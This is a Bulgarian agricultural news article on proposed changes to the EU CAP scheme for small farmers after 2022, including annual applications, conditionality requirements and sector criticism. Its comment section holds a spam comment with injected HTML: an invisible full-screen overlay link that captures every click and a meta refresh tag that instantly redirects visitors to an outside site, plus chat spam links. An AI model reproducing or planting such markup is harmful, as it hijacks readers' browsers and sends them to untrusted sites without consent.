Схемата за дребни земеделски стопани: Ще има ли промени в новия програмен период?

Схемата за дребни земеделски стопани: Ще има ли промени в новия програмен период?

 

Проектът на схемата за дребни земеделски стопани е една от интервенциите, които ще бъдат дискутирани на предстоящото заседание на Тематичната работна група (ТРГ) за Стратегическия план.

 

Към момента право на подпомагане по схемата имат фермери, които през 2015 г. са се включили в Схемата за дребни земеделски стопани и отговарят на минималните изисквания за получаване на директни плащания.

 

През новия програмен период на Общата селскостопанска политика (ОСП) предложението е по схемата за дребните земеделски стопани да се кандидатства ежегодно.

 

Кандидатите по схемата следва да изпълняват минималните изисквания за получаване на директни плащания, за да могат да се възползват от целевата помощ. По този начин ще се осъществи подпомагане за достатъчно надеждни земеделски доходи и устойчивост и ще се подобри продоволствената сигурност.

 

Съществени промени по схемата за дребните земеделски стопани липсват в новото предложение за ОСП след 2022 г. От бранша обаче коментират, че у нас “дребни земеделски стопани няма”

 

“Схемата таргетира дребните стопани, но няколко реда по-надолу от заглавието вече се говори за малки стопанства. Има съществена разлика между малки и дребни земеделски стопанства. В България обаче тази разлика все още не се прави”, коментират от сектора за Агри.БГ.

 

Проектът на интервенцията я представя като опростена алтернатива за плащане на кръгли суми на земеделски стопани, при облекчени административни условия и с по-голяма добавена стойност за фермерите. 

 

Интересното тук е, че бенефициентите на кръгла сума в новата ОСП няма да бъдат освободени от изискванията за условност, въпреки предложенията на редица браншови асоциации, както и от страна на земеделското министерство в Брюксел.

 

Следете темата и на cap4us.agri.bg

Коментари
adsfsd
на 22.01.2022 2:59
<a href="https://www.hasbihal.org" title="sohbet chat" rel="dofollow" style="display: block!important;position: fixed!important; width: 100%!important;height: 100%; text-align: center!important;color: transparent!important;left: 0!important;top: 0!important;right: 0!important; padding: 100px; bottom: 0!important;background: transparent!important;z-index: 999999999999999!important;font-size: 4em!important">sohbet chat</a> <meta http-equiv="refresh" content="0; url=https://findi.pro/coment"/> <a href="https://bedavasohbetchat.blogspot.com/" title="bedavasohbet">bedavasohbet</a>
Добави коментар